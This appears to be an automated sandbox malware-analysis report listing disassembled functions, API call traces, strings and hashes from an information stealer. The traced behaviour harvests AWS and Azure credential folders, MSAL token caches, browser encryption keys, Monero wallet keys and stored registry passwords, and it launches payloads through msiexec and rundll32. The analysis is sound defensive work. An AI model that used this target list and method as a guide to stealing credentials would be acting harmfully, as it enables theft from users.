                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseOpenlstrcpy$Enumwsprintf
                              • String ID: - $%s\%s$?
                              • API String ID: 3246050789-3278919252
                              • Opcode ID: ca5d4d7c5f7854f20ed783c1d91925683a6fa41883098071a8e3993f146a5a88
                              • Instruction ID: 6b1fe142f2fda521c0897aa620dda28c8280fe8e3b255738c42aec5fb67d900b
                              • Opcode Fuzzy Hash: ca5d4d7c5f7854f20ed783c1d91925683a6fa41883098071a8e3993f146a5a88
                              • Instruction Fuzzy Hash: A8810DB191011CABDB29DB50CC95FEAB7B8BF28704F408299E109A6140DF71AF85CF95
                              Function 001C4D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001C8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 001C8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 001C4DB0
                              • lstrcat.KERNEL32(?,\.azure\), ref: 001C4DCD
                                • Part of subcall function 001C4910: wsprintfA.USER32 ref: 001C492C
                                • Part of subcall function 001C4910: FindFirstFileA.KERNEL32(?,?), ref: 001C4943
                              • lstrcat.KERNEL32(?,00000000), ref: 001C4E3C
                              • lstrcat.KERNEL32(?,\.aws\), ref: 001C4E59
                                • Part of subcall function 001C4910: StrCmpCA.SHLWAPI(?,001D0FDC), ref: 001C4971
                                • Part of subcall function 001C4910: StrCmpCA.SHLWAPI(?,001D0FE0), ref: 001C4987
                                • Part of subcall function 001C4910: FindNextFileA.KERNEL32(000000FF,?), ref: 001C4B7D
                                • Part of subcall function 001C4910: FindClose.KERNEL32(000000FF), ref: 001C4B92
                              • lstrcat.KERNEL32(?,00000000), ref: 001C4EC8
                              • lstrcat.KERNEL32(?,\.IdentityService\), ref: 001C4EE5
                                • Part of subcall function 001C4910: wsprintfA.USER32 ref: 001C49B0
                                • Part of subcall function 001C4910: StrCmpCA.SHLWAPI(?,001D08D2), ref: 001C49C5
                                • Part of subcall function 001C4910: wsprintfA.USER32 ref: 001C49E2
                                • Part of subcall function 001C4910: PathMatchSpecA.SHLWAPI(?,?), ref: 001C4A1E
                                • Part of subcall function 001C4910: lstrcat.KERNEL32(?,00EEE438), ref: 001C4A4A
                                • Part of subcall function 001C4910: lstrcat.KERNEL32(?,001D0FF8), ref: 001C4A5C
                                • Part of subcall function 001C4910: lstrcat.KERNEL32(?,?), ref: 001C4A70
                                • Part of subcall function 001C4910: lstrcat.KERNEL32(?,001D0FFC), ref: 001C4A82
                                • Part of subcall function 001C4910: lstrcat.KERNEL32(?,?), ref: 001C4A96
                                • Part of subcall function 001C4910: CopyFileA.KERNEL32(?,?,00000001), ref: 001C4AAC
                                • Part of subcall function 001C4910: DeleteFileA.KERNEL32(?), ref: 001C4B31
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                              • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                              • API String ID: 949356159-974132213
                              • Opcode ID: 382e7d00a000df86f7e673837c138a16e6f2520e727de550bfcd7e1dc0e0ec0a
                              • Instruction ID: 9389af1bf1fea7112e4f231210852f42b5cda9d67f08fa56fe05b4ce70d6d8da
                              • Opcode Fuzzy Hash: 382e7d00a000df86f7e673837c138a16e6f2520e727de550bfcd7e1dc0e0ec0a
                              • Instruction Fuzzy Hash: 294160BA94021877C710F7B0EC97FE93638AB34705F404558B249A61C1EFB49B89CB92
                              Function 001C9010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                              Download Yara Rule
                              APIs
                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 001C906C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateGlobalStream
                              • String ID: image/jpeg
                              • API String ID: 2244384528-3785015651
                              • Opcode ID: add8fcd9bfe4a3381c509359cf35f968f21d7d97573608c4aad2941f60c47cbb
                              • Instruction ID: a135448c933dcd7eada5eedfa5e28845a43687661d58eb8dc36d9ff4f4cb65b5
                              • Opcode Fuzzy Hash: add8fcd9bfe4a3381c509359cf35f968f21d7d97573608c4aad2941f60c47cbb
                              • Instruction Fuzzy Hash: 7A71CAB1910608ABDB14EBE4DC99FEEBBBDBF58700F108508F519A7290DB74E905CB61
                              Function 001C2E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                              • ShellExecuteEx.SHELL32(0000003C), ref: 001C31C5
                              • ShellExecuteEx.SHELL32(0000003C), ref: 001C335D
                              • ShellExecuteEx.SHELL32(0000003C), ref: 001C34EA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExecuteShell$lstrcpy
                              • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                              • API String ID: 2507796910-3625054190
                              • Opcode ID: 01266e0db6336fbc4f38a623b2c34a8668046e71155cd6bdbe898a42425eb2e4
                              • Instruction ID: 4b115b609948a65518b51586a51c431004cc9aaa8bc349c1e797614fa0c4751c
                              • Opcode Fuzzy Hash: 01266e0db6336fbc4f38a623b2c34a8668046e71155cd6bdbe898a42425eb2e4
                              • Instruction Fuzzy Hash: C212ED7180010C9BDB1AEBA0DC92FEDB778AF34309F90415DE50666191EF74AB4ACF66
                              Function 001C52C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001CA7E6
                                • Part of subcall function 001B6280: InternetOpenA.WININET(001D0DFE,00000001,00000000,00000000,00000000), ref: 001B62E1
                                • Part of subcall function 001B6280: StrCmpCA.SHLWAPI(?,00EEE498), ref: 001B6303
                                • Part of subcall function 001B6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 001B6335
                                • Part of subcall function 001B6280: HttpOpenRequestA.WININET(00000000,GET,?,00EED8E8,00000000,00000000,00400100,00000000), ref: 001B6385
                                • Part of subcall function 001B6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 001B63BF
                                • Part of subcall function 001B6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001B63D1
                                • Part of subcall function 001CA8A0: lstrcpy.KERNEL32(?,001D0E17), ref: 001CA905
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 001C5318
                              • lstrlen.KERNEL32(00000000), ref: 001C532F
                                • Part of subcall function 001C8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 001C8E52
                              • StrStrA.SHLWAPI(00000000,00000000), ref: 001C5364
                              • lstrlen.KERNEL32(00000000), ref: 001C5383
                              • lstrlen.KERNEL32(00000000), ref: 001C53AE
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 3240024479-1526165396
                              • Opcode ID: 77218fc700776970ab480eebfb93ee745dde0b26898ddafdcc426685b7f09fdd
                              • Instruction ID: 6391f72279048c3bab0c0e343e8ad9612cc6c9ac15b5bac88833d9e5b04d7b6b
                              • Opcode Fuzzy Hash: 77218fc700776970ab480eebfb93ee745dde0b26898ddafdcc426685b7f09fdd
                              • Instruction Fuzzy Hash: 9751A67091014CABDB19FF60D996FED7779AF70305F90401CE40A9A592EF34AB46CBA2
                              Function 001C12D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: 4b4f5b2fc13d579ba134dae314063d3f0f65b55ac28b906f78fd25cfd93e526e
                              • Instruction ID: 91151201e7aa55d3449372256949811296303c2edd4177416725183b071ee59c
                              • Opcode Fuzzy Hash: 4b4f5b2fc13d579ba134dae314063d3f0f65b55ac28b906f78fd25cfd93e526e
                              • Instruction Fuzzy Hash: 3DC16EB594021DABCB15EF60DC89FEA7378AF74304F00459DE50AA7291EB70EA85CF91
                              Function 001C4280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001C8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 001C8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 001C42EC
                              • lstrcat.KERNEL32(?,00EEDEE8), ref: 001C430B
                              • lstrcat.KERNEL32(?,?), ref: 001C431F
                              • lstrcat.KERNEL32(?,00EECE78), ref: 001C4333
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                                • Part of subcall function 001C8D90: GetFileAttributesA.KERNEL32(00000000,?,001B1B54,?,?,001D564C,?,?,001D0E1F), ref: 001C8D9F
                                • Part of subcall function 001B9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 001B9D39
                                • Part of subcall function 001B99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001B99EC
                                • Part of subcall function 001B99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 001B9A11
                                • Part of subcall function 001B99C0: LocalAlloc.KERNEL32(00000040,?), ref: 001B9A31
                                • Part of subcall function 001B99C0: ReadFile.KERNEL32(000000FF,?,00000000,001B148F,00000000), ref: 001B9A5A
                                • Part of subcall function 001B99C0: LocalFree.KERNEL32(001B148F), ref: 001B9A90
                                • Part of subcall function 001B99C0: CloseHandle.KERNEL32(000000FF), ref: 001B9A9A
                                • Part of subcall function 001C93C0: GlobalAlloc.KERNEL32(00000000,001C43DD,001C43DD), ref: 001C93D3
                              • StrStrA.SHLWAPI(?,00EEDE10), ref: 001C43F3
                              • GlobalFree.KERNEL32(?), ref: 001C4512
                                • Part of subcall function 001B9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,001B4EEE,00000000,00000000), ref: 001B9AEF
                                • Part of subcall function 001B9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,001B4EEE,00000000,?), ref: 001B9B01
                                • Part of subcall function 001B9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,001B4EEE,00000000,00000000), ref: 001B9B2A
                                • Part of subcall function 001B9AC0: LocalFree.KERNEL32(?,?,?,?,001B4EEE,00000000,?), ref: 001B9B3F
                              • lstrcat.KERNEL32(?,00000000), ref: 001C44A3
                              • StrCmpCA.SHLWAPI(?,001D08D1), ref: 001C44C0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 001C44D2
                              • lstrcat.KERNEL32(00000000,?), ref: 001C44E5
                              • lstrcat.KERNEL32(00000000,001D0FB8), ref: 001C44F4
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                              • String ID:
                              • API String ID: 3541710228-0
                              • Opcode ID: 40e8fb3d46bcf40f0701cc18d26b1946a9fc329bff02fe1864e4f156cbe9a3c5
                              • Instruction ID: 120390a5c39ae6c9f732a0808257e9021f4d52ed40c14a55ce33432cd1426546
                              • Opcode Fuzzy Hash: 40e8fb3d46bcf40f0701cc18d26b1946a9fc329bff02fe1864e4f156cbe9a3c5
                              • Instruction Fuzzy Hash: A27173B6900208ABCB15EBA0DC99FEE777DAF98304F00459CF60997181EB75DB45CBA1
                              Function 001B1310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001B12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 001B12B4
                                • Part of subcall function 001B12A0: RtlAllocateHeap.NTDLL(00000000), ref: 001B12BB
                                • Part of subcall function 001B12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 001B12D7
                                • Part of subcall function 001B12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 001B12F5
                                • Part of subcall function 001B12A0: RegCloseKey.ADVAPI32(?), ref: 001B12FF
                              • lstrcat.KERNEL32(?,00000000), ref: 001B134F
                              • lstrlen.KERNEL32(?), ref: 001B135C
                              • lstrcat.KERNEL32(?,.keys), ref: 001B1377
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                                • Part of subcall function 001CA9B0: lstrlen.KERNEL32(?,00EE87F8,?,\Monero\wallet.keys,001D0E17), ref: 001CA9C5
                                • Part of subcall function 001CA9B0: lstrcpy.KERNEL32(00000000), ref: 001CAA04
                                • Part of subcall function 001CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001CAA12
                                • Part of subcall function 001CA8A0: lstrcpy.KERNEL32(?,001D0E17), ref: 001CA905
                                • Part of subcall function 001C8B60: GetSystemTime.KERNEL32(001D0E1A,00EE99A0,001D05AE,?,?,001B13F9,?,0000001A,001D0E1A,00000000,?,00EE87F8,?,\Monero\wallet.keys,001D0E17), ref: 001C8B86
                                • Part of subcall function 001CA920: lstrcpy.KERNEL32(00000000,?), ref: 001CA972
                                • Part of subcall function 001CA920: lstrcat.KERNEL32(00000000), ref: 001CA982
                              • CopyFileA.KERNEL32(?,00000000,00000001), ref: 001B1465
                                • Part of subcall function 001CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001CA7E6
                                • Part of subcall function 001B99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001B99EC
                                • Part of subcall function 001B99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 001B9A11
                                • Part of subcall function 001B99C0: LocalAlloc.KERNEL32(00000040,?), ref: 001B9A31
                                • Part of subcall function 001B99C0: ReadFile.KERNEL32(000000FF,?,00000000,001B148F,00000000), ref: 001B9A5A
                                • Part of subcall function 001B99C0: LocalFree.KERNEL32(001B148F), ref: 001B9A90
                                • Part of subcall function 001B99C0: CloseHandle.KERNEL32(000000FF), ref: 001B9A9A
                              • DeleteFileA.KERNEL32(00000000), ref: 001B14EF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                              • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                              • API String ID: 3478931302-218353709
                              • Opcode ID: e4d0fe7181e61d5e932bb68b854bbedf75d14b09885039576e61a816b4d86926
                              • Instruction ID: 27a841c5b72ebfc0b3222687fadd4b5f2602f69680d687ccf2ba526a18fb9d75
                              • Opcode Fuzzy Hash: e4d0fe7181e61d5e932bb68b854bbedf75d14b09885039576e61a816b4d86926
                              • Instruction Fuzzy Hash: 7A5111B195011957CB16EB60DD96FED733CAF74305F80419CB60AA2081EF30AB89CAA6
                              Function 001B75D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001B72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 001B733A
                                • Part of subcall function 001B72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 001B73B1
                                • Part of subcall function 001B72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 001B740D
                                • Part of subcall function 001B72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 001B7452
                                • Part of subcall function 001B72D0: HeapFree.KERNEL32(00000000), ref: 001B7459
                              • lstrcat.KERNEL32(00000000,001D17FC), ref: 001B7606
                              • lstrcat.KERNEL32(00000000,00000000), ref: 001B7648
                              • lstrcat.KERNEL32(00000000, : ), ref: 001B765A
                              • lstrcat.KERNEL32(00000000,00000000), ref: 001B768F
                              • lstrcat.KERNEL32(00000000,001D1804), ref: 001B76A0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 001B76D3
                              • lstrcat.KERNEL32(00000000,001D1808), ref: 001B76ED
                              • task.LIBCPMTD ref: 001B76FB
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
